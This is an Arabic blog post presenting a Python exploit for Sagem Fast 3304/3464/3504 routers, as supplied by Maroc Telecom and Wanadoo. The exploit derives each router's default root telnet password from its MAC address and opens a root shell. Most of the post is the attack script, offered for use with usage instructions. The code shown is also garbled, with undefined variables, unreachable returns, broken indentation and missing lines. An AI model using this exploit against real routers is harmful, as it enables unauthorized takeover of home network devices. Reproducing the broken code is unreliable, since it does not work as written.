ثغرة تجاوز نافذة التحقق من المستخدم في روتر إتصالات المغرب Sagem Router Fast 3304

  ثغرة في التلنت خاصة بروتر إتصالات المغرب 
Sagem Router Fast 3304
تمكنك من تجاوز إستخدام الباسوورد وإسم
المستخدم لولوج لوحة تحكم الروتر بصلاحيات الروت . وقد قام بإكتشافها الوفيق علي فيما يمكنك كذلك تطبيق الثغرة على كل من إصدارات 3464/3504
وهذا كود الثغرة مكتوب باللغة البايثون 


# Remote Exploit: SAGEM ROUTER FAST 3304/3464/3504 - Telnet Authentication bypass
# Date: 15-August-2011
# Author: Elouafiq Ali
# Version: 3304-V1 / 3304-V2 / 3464 / 3504
# Tested on: Linux Ubuntu 11.04, Linux Backtrack 5
# Tested Router: SAGEM FAST 3304-V2
# Tested on Resellers/ISPs: Wanadoo (France), Maroc Telecom (Morocco)
# Products affected: Sagem Fast 3304-V1 / 3304-V2 / 3464 / 3504
# Blog: http://keelhaule.tumblr.com
    Sagem Fast Routers (3304-V1 / 3304-V2 / 3464 / 3504) Come with a default Preconfigured Root Password
    That the ISPs don't change it, but instead they create another admin account above it,
    the root password differs from a router to another, since it is computed from its MAC address.
    Thus, each unique router has its own password what makes bruteforce or dictionary attacks inefficient or impossible
    After reverse engineering the Algorithm that computes the default password based on the MAC address
    This exploit opens a remote shell in the remote host.
    (Generally its an Almquist Shell 'ash', which commands are compatible to the Bourne Shell 'bsh')
    Usage: ./{file_name} ip_adress mac_address
from telnetlib import Telnet
import time, sys, tty, termios
from threading import *
host = ''
port = 23
user = "root"
class ReaderThread(Thread):
        def __init__(self, telnet):
                self.telnet = telnet
        def run(self):
                while 1:
                        str = self.telnet.read_some()
                        if str == '': break
def mash(a,b):
  if( int(second ,16 ) < 10) :
      return chr(ord(first)+int(second,16))
      return hex(ord(first)+int(second,16))
      return chr(ord(second)+int(first,16))
def main(host, port):
        telnet = Telnet()
        telnet.open(host, port)
    #Usually Telnet prompt starts with this, if the telnet service provide another
    #prompt, change it to that prompt
    telnet.read_until("login: ")
    telnet.write(user + "n")
    #the note above also applies for this
    telnet.read_until("Password: ")
    telnet.write(password + "n")
    #just omit this line if you want to just have the telnet command prompt,
    #or change it to what feel confortable with
        reader = ReaderThread(telnet)
    fd = sys.stdin.fileno()
    old_settings = termios.tcgetattr(fd)
        while 1:
                if not reader.isAlive(): break
        ch = sys.stdin.read(1)
    termios.tcsetattr(fd, 1, old_settings)
if __name__ == '__main__':
                host = sys.argv[1]
        except: pass
    #some arbitrary value
    password=[ c for c in "00000000" ]
    if lenght!=12 :
        # Input Sanitization and Normalization
        if lenght==17:
            if mac_address[2]==':' :
                mac_address = "".join([i.zfill(2) for i in mac_address.split(":")]).lower()
            elif mac_address[2]=='-' :
                mac_address = "".join([i.zfill(2) for i in mac_address.split(":")]).lower()
                print  '[!] Please enter a valid MAC address!' 
            print  "[!] Please enter a valid MAC address!"
    mac=[ c.lower() for c in mac_address]
    password[0]= mash(mac[5],mac[11])
    password[1]= mash(mac[0],mac[2])
    password[2]= mash(mac[10],mac[11])
    password[3]= mash(mac[0],mac[9])
    password[4]= mash(mac[10],mac[6])
    password[5]= mash(mac[3],mac[9])
    password[6]= mash(mac[1],mac[6])
    password[7]= mash(mac[3],mac[4])
    password="".join(p for p in password)
    print "[+] W00t The Passwd is ", password
        main(host, port)